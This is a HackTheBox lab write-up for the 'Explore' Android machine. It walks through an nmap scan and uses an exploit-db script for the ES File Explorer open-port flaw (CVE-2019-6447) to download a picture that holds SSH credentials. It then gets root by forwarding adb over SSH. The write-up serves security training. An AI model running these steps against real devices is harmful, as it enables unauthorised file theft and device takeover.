HackTheBox: Explore Writeups

Initial Foothold

As usual, I started with a full-port scan using nmap:

sudo nmap -p- -A 10.10.10.247     

Not shown: 998 closed ports
PORT      STATE    SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
42135/tcp open http ES File Explorer Name Response httpd
|_http-server-header: ES Name Response Server
|_http-title: Site doesn't have a title (text/html).
42855/tcp open unknown
| fingerprint-strings:
| GenericLines:
| HTTP/1.0 400 Bad Request
| Date: Sun, 22 Aug 2021 09:57:34 GMT
| Content-Length: 22
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| GetRequest:
| HTTP/1.1 412 Precondition Failed
| Date: Sun, 22 Aug 2021 09:57:34 GMT
| Content-Length: 0
| HTTPOptions:
| HTTP/1.0 501 Not Implemented
| Date: Sun, 22 Aug 2021 09:57:40 GMT
| Content-Length: 29
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Method not supported: OPTIONS
| Help:
| HTTP/1.0 400 Bad Request
| Date: Sun, 22 Aug 2021 09:57:57 GMT
| Content-Length: 26
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line: HELP
| RTSPRequest:
| HTTP/1.0 400 Bad Request
| Date: Sun, 22 Aug 2021 09:57:40 GMT
| Content-Length: 39
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| valid protocol version: RTSP/1.0
| SSLSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Sun, 22 Aug 2021 09:57:57 GMT
| Content-Length: 73
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ?G???,???`~?
| ??{????w????<=?o?
| TLSSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Sun, 22 Aug 2021 09:57:58 GMT
| Content-Length: 71
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ??random1random2random3random4
| TerminalServerCookie:
| HTTP/1.0 400 Bad Request
| Date: Sun, 22 Aug 2021 09:57:58 GMT
| Content-Length: 54
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
|_ Cookie: mstshash=nmap
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
Network Distance: 2 hops

TRACEROUTE (using port 256/tcp)
HOP RTT       ADDRESS
1   300.71 ms 10.10.14.1
2   301.27 ms 10.10.10.247

A few things stand out. Port 5555 is the default TCP port of adb (Android Debug Bridge) and is filtered from our side, and the "Banana Studio" SSH banner on 2222 belongs to an Android SSH server app, so the target is an Android device. Nmap labels 59777 as a Minecraft Bukkit JSONAPI, but that is a misfingerprint: together with the "ES Name Response" server on 42135 it is the HTTP service that ES File Explorer opens on port 59777.

That service has a known vulnerability (CVE-2019-6447, ES File Explorer 4.1.9.7.4 open port): anyone who can reach port 59777 can list and download files from the device with no authentication at all. A working exploit is available on exploit-db:

https://www.exploit-db.com/exploits/50070

Exploiting User

The script takes a command, the target, and optionally a file path. Using the listPics command, we get a list of images on the device, and one of them looks interesting:

python 50070.py listPics explore.htb

We can download that file with the getFile command:

python 50070.py getFile explore.htb /storage/emulated/0/DCIM/creds.jpg

Opening the downloaded image, it shows a username and password:

user : kristi
pass : Kr1sT!5h@Rp3xPl0r3!

We can use these credentials to log in over SSH, which is listening on port 2222:

ssh kristi@explore.htb -p 2222

The user flag is located at /sdcard/user.txt.

Privilege Escalation

Port 5555 (adb) showed as filtered in the scan, so the adb daemon is only reachable from localhost on the device itself. Since we already have SSH access, we can forward that port through the SSH session and then talk to adb from our own machine:

ssh kristi@explore.htb -p 2222 -L 5555:127.0.0.1:5555

# on another terminal
adb connect localhost:5555
adb devices        # should list localhost:5555 as "device"
adb -s localhost:5555 shell
su

The -s localhost:5555 flag selects the forwarded device explicitly, in case other devices or emulators are attached. If adb connect hangs or reports "connection refused", check that the forward is up (the ssh session must still be open) before troubleshooting adb itself.

The root flag is located at /data/root.txt.
